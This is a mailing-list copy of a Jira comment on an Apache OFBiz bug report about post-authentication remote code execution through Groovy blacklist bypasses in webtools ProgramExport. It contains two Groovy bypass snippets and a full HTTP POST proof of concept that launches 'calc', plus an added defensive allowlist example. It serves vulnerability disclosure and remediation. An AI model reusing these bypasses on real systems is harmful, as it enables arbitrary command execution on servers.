Posted to notifications@ofbiz.apache.org by "Y4er (Jira)" <ji...@apache.org> on 2022/02/11 01:03:00 UTC

[jira] [Commented] (OFBIZ-12571) groovy blacklist bypass cause post-auth RCE from webtools/control/ProgramExport

    [ https://issues.apache.org/jira/browse/OFBIZ-12571?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=17490593#comment-17490593 ] 

Y4er commented on OFBIZ-12571:
------------------------------

Simply adding a blacklist can't solve the fundamental problem. Judging from the current blacklist after the repair

[https://github.com/apache/ofbiz-framework/commit/f2cf262cf56df86612971bf4dac82795c1e3a512#diff-5d4b97fff9ee1d57e4c1d8274847e196ba5404f367afb3e39025f583a3e95e1aR252]

there are still many ways to RCE, for example:

{code:java}
// example 1
def strings = new ArrayList<String>();
strings.add("calc")
def instance = Class.forName("java.lang.Pr" + "ocessBuilder").getDeclaredConstructor(List.class).newInstance(strings)
def method = instance.getClass().getDeclaredMethod("start", null)
method.invoke(instance,null)

// example 2
evaluate("Proces"+"sBuilder.newInstance(\"calc\").start()")
{code}
Given the flexibility of the groovy language, we cannot fix this vulnerability just by string blacklisting, because there are always multiple unknown bypasses.

Perhaps the groovy sandbox should be considered to handle this.
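To illustrate the sandbox direction suggested above, here is an added example (not OFBiz code) built on Groovy's own SecureASTCustomizer, using the property names of Groovy 2.5/3.x. It compiles scripts against an allowlist of AST constructs instead of a string denylist, so the two bypass shapes shown in the comment, a class name assembled by concatenation and a nested evaluate(), are refused at compile time whatever the source text looks like; the probe scripts are constructed and harmless.

```groovy
import org.codehaus.groovy.control.CompilerConfiguration
import org.codehaus.groovy.control.MultipleCompilationErrorsException
import org.codehaus.groovy.control.customizers.SecureASTCustomizer
import static org.codehaus.groovy.syntax.Types.*

// Build a GroovyShell whose compiler accepts only an explicit allowlist of AST
// constructs: numeric constants, arithmetic/comparison operators, and method
// calls on a handful of receiver classes. Everything else fails to compile.
GroovyShell arithmeticOnlyShell() {
    def secure = new SecureASTCustomizer()
    secure.with {
        closuresAllowed = false
        methodDefinitionAllowed = false
        packageAllowed = false
        importsWhitelist = []            // empty list: no explicit imports at all
        staticImportsWhitelist = []
        starImportsWhitelist = []
        staticStarImportsWhitelist = []
        tokensWhitelist = [PLUS, MINUS, MULTIPLY, DIVIDE, MOD, POWER,
                           COMPARE_EQUAL, COMPARE_NOT_EQUAL,
                           COMPARE_LESS_THAN, COMPARE_GREATER_THAN]
        // No String here: class names can no longer be assembled from pieces.
        constantTypesClassesWhiteList = [Integer, Long, Double, BigDecimal,
                                         Integer.TYPE, Long.TYPE, Double.TYPE]
        receiversClassesWhiteList = [Math, Integer, Long, Double, BigDecimal]
    }
    def config = new CompilerConfiguration()
    config.addCompilationCustomizers(secure)
    return new GroovyShell(config)
}

// True when the script is refused at compile time. SecureASTCustomizer throws
// SecurityException; depending on the Groovy version it may arrive wrapped in
// MultipleCompilationErrorsException, so both are handled.
boolean refused(GroovyShell shell, String script) {
    try {
        shell.evaluate(script)
        return false
    } catch (SecurityException | MultipleCompilationErrorsException e) {
        return true
    }
}

def shell = arithmeticOnlyShell()
assert shell.evaluate('2 * Math.sqrt(16)') == 8.0d      // plain arithmetic passes
// Constructed probes for the two bypass shapes in the comment above. Both are
// refused because the check is on AST node types, not on the source text.
assert refused(shell, 'Class.forName("java.lang.Str" + "ing")')
assert refused(shell, 'evaluate("1 + 1")')
assert refused(shell, 'def s = "x"; s.bytes')          // String constant itself
println 'allowlist holds for all probes'
```

This is a compile-time grammar restriction rather than a runtime sandbox, and a script runner like ProgramExport would need a far broader allowlist than arithmetic, so treat it as a demonstration of allowlisting by construct, not a drop-in fix.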

> groovy blacklist bypass cause post-auth RCE from webtools/control/ProgramExport
> -------------------------------------------------------------------------------
>
>                 Key: OFBIZ-12571
>                 URL: https://issues.apache.org/jira/browse/OFBIZ-12571
>             Project: OFBiz
>          Issue Type: Bug
>          Components: framework/webtools
>    Affects Versions: 18.12.05
>         Environment: ofbiz 18.12.05
>            Reporter: Y4er
>            Assignee: Jacques Le Roux
>            Priority: Major
>             Fix For: 18.12.06, 22.01.01
>
>         Attachments: image-2022-02-10-17-50-58-914.png
>
>
> groovy blacklist bypass cause post-auth RCE from webtools/control/ProgramExport
>  
> {code:java}
> POST /webtools/control/ProgramExport HTTP/1.1
> Host: 192.168.1.178:8443
> Cookie: JSESSIONID=256ECC64937BFB5F47A32A14B272EE8F.jvm1; webtools.securedLoginId=admin; OFBiz.Visitor=10302
> Content-Type: application/x-www-form-urlencoded
> Connection: close
> Content-Length: 68
> groovyProgram=ProcessBuilder.newInstance%28%22calc%22%29.start%28%29 {code}
> !image-2022-02-10-17-50-58-914.png|width=751,height=407!



--
This message was sent by Atlassian Jira
(v8.20.1#820001)